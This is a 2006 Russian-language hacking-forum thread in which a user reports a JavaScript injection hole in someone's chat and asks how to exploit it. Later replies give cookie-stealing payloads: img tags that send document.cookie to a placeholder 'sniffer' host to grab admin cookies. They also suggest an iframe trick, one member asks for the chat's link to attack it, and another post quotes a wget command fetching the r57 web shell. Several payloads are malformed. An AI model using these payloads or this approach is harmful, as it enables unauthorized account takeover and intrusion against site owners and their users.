Чаты Java Script Including ??

Discussion in 'Веб-уязвимости' started by Adio, 31 May 2006.

Thread Status:
Not open for further replies.
  1. Adio

    Adio Elder - Старейшина

    Joined:
    23 May 2005
    Messages:
    1,646
    Likes Received:
    148
    Reputations:
    18
    Привет всем нашол дыру в чате мона вставлять java script самое интересное я всегда почти дыры нахожу ))) Но вот юзать их я не умею что подскажите ? Сервер Апач 2.11 помойму система Win nt И вообще что можно вставить с помошью жава скрипт ??? кроме чтение cookies ...????
     
  2. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    гениальный пост
    особенно название

    пофигу какой версии апач стоит, пофигу какая ОС... с помощью джава скрипта ты как нистранно, можешь много что сделать, на что соображалки хватит, то и делай. А вот кукисы ты благодаря снифферу "читаешь".. java script лишь проводник
     
    1 person likes this.
  3. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    У меня такая же проблема!!!! ПОМОГИТЕ!!! Короче я нашел vb-including. Т.е. я выполняю на системе vbscript:alert(); и он РАБОТАЕТ! Но когда я пытаюсь залить шелл vbscript:wget http://rst.void.ru/download/r57shell.txt -0 etoneshell.php он наверное ошибается и синтакс меняется! Как быть???

    Люди плиз, иначе я красным писать начну!
     
  4. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Java Script Including. Долго я угорал над названия темы :D
     
    1 person likes this.
  5. drmist

    drmist Member

    Joined:
    8 Oct 2005
    Messages:
    307
    Likes Received:
    94
    Reputations:
    80
    Охренеть........
    три ответа трех мемберов с >300 почтов, а содержание "ты дурак, мы умные"

    Adio
    На будущее перед тем, как задавать вопрос, советую Вам воспользоваться поиском по форуму. Если Вы не нашли ответ на Ваш вопрос, воспользуйтесь поисковыми системами google.com или yandex.ru.
    Вот например полезные темы из раздела "Статьи":
    http://forum.antichat.ru/threadnav18872-1-10.html
    http://forum.antichat.ru/threadnav18719-1-10.html
    http://forum.antichat.ru/threadnav13949-1-10.html
    http://forum.antichat.ru/thread12124.html

    Также советую прочитать мою статью:
    http://www.security-teams.net/index.php?showtopic=2492
     
    1 person likes this.
  6. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    drmist, ни в коем случае. Я согласен, что не раскрыл тему. Какой вопрос - таков ответ.
    А ты молодец. Надеюсь создателю топика эти ссылки помогут.
     
  7. Adio

    Adio Elder - Старейшина

    Joined:
    23 May 2005
    Messages:
    1,646
    Likes Received:
    148
    Reputations:
    18
    Привет вот собственно и я ))) Пасибо за ссылки )) конешшно )) но у меня вопрос такой
    Можно как то пробраться на сервер с помощью жава скрипт ??? потому что только жава скрипт и html распазнаёт ( так вот только кукисы мона тырить получаеться ???
    Ну раз никак с помощью java script нильзя то скажите как мона тырить cookie без использование ALERT ??? тоесть типа мышкой по картинке куки в лог ?
     
    3 people like this.
  8. dEm0N

    dEm0N New Member

    Joined:
    20 May 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Если можна вставить java script то можна спырить админские кукисы...........
     
  9. dEm0N

    dEm0N New Member

    Joined:
    20 May 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    читай }{акер там по веб хаку дофига инфы.
    Кста дай ссылку на етот чат, я его покалупаю маленько...
     
  10. Adio

    Adio Elder - Старейшина

    Joined:
    23 May 2005
    Messages:
    1,646
    Likes Received:
    148
    Reputations:
    18
    КАк мона Стрырить Админские Кукисы ??? Заставить админа зайти на xss сраничку ? )))
    Да он не дурак по ходу дела !
     
  11. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    Поставь страницку в iframe :)
     
  12. dEm0N

    dEm0N New Member

    Joined:
    20 May 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    нет можна вставить ссылку на сниффе прям на страницу нужна прописать чета типа
    "<img src=javascript:window.location=http://adres-snifera>ru/>"
    а админу не надобудет кудалибо заходить мы ему поможем )
    или прописать такое "<img src=Http://adres-sniffera.ru/snifer.cgi? +documen.cookie> последний вариан не такой палевый ,
    зы если чето не правильна я невиноват , я новичок в скрипт кидинге.....
     
  13. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Обсуждать уже нечего. Уже больше похоже на обсуждение "как впарить ссылку" админу, но это уже не в этот раздел. Насчёт xss уже не знаю что можно тут сказать, проговорили уже всё. drmist ответил на вопрос, дав ссылки. Так же нужно воспользоваться поиском по форуму, и прочитать статьи на сайте античата. (как минимум)
    [closed]
     
Thread Status:
Not open for further replies.